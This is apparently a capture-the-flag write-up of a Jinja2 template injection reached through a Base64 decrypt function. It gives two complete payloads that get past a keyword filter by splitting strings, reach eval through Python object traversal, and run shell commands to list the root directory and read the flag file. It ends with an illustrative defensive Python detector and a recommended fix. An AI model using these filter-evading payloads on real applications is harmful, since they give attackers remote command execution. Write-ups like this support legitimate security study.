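Submitting e3sxKzF9fQ== (the Base64 encoding of {{1+1}}) to the decrypt function returns 2, which shows that the decoded input is evaluated as a template, so a template injection exists.
Testing shows that keywords such as flag (ZmxhZyA=), import, os and eval are filtered.
Something I learned here: use string concatenation to list the directory: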
{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals__.values() %} {% if b.__class__ == {}.__class__ %} {% if 'eva'+'l' in b.keys() %} {{ b['eva'+'l']('__impor'+'t__'+'("o'+'s")'+'.pope'+'n'+'("ls /").read()') }} {% endif %} {% endif %} {% endfor %} {% endif %} {% endfor %}
Note that this_is_the_flag.txt is present; its name has to be split by concatenation as well:
{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals__.values() %} {% if b.__class__ == {}.__class__ %} {% if 'eva'+'l' in b.keys() %} {{ b['eva'+'l']('__impor'+'t__'+'("o'+'s")'+'.pope'+'n'+'("cat /this_is_the_fl"+"ag.txt").read()') }} {% endif %} {% endif %} {% endfor %} {% endif %} {% endfor %}
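From the defender's side, the following added example (not code from the challenge) shows why the keyword filter described above lets split strings through, and how a structural check on the decoded value still flags them. The function names, the sample values, and the assumption that the filter matches on the decoded text are all constructed for illustration.

```python
import base64
import re

# Keywords the write-up reports as filtered; matching on decoded text is an assumption.
BLACKLIST = ("flag", "import", "os", "eval")
# Jinja2 expression, statement and comment delimiters.
DELIMITERS = re.compile(r"\{\{|\{%|\{#")
# Dunder names such as __class__ or __globals__, typical of object traversal.
DUNDER = re.compile(r"__[A-Za-z]+__")


def decode(b64_value):
    """Return the decoded text, or None when the value is not Base64/UTF-8."""
    try:
        return base64.b64decode(b64_value, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def keyword_filter_passes(text):
    """Mimic a keyword blacklist: True when no listed keyword appears."""
    lowered = text.lower()
    return not any(word in lowered for word in BLACKLIST)


def classify(b64_value):
    """Classify a submitted value by structure instead of by keyword."""
    text = decode(b64_value)
    if text is None:
        return "invalid"
    if not DELIMITERS.search(text):
        return "plain"
    return "template+dunder" if DUNDER.search(text) else "template"


def encode(text):
    return base64.b64encode(text.encode()).decode()


# Constructed samples; "split" reuses fragments of the payload shown above.
SAMPLES = {
    "greeting": encode("hello world"),
    "probe": "e3sxKzF9fQ==",  # the {{1+1}} probe from the write-up
    "split": encode("{% if 'eva'+'l' in b.keys() %}{{ c.__init__.__globals__ }}{% endif %}"),
}


def report():
    """Map sample name -> (passes keyword filter, structural classification)."""
    return {n: (keyword_filter_passes(decode(v) or ""), classify(v)) for n, v in SAMPLES.items()}
```

The structural check is useful for logging and alerting; the underlying fix is to pass the decoded text to the template as a variable and never use it as template source.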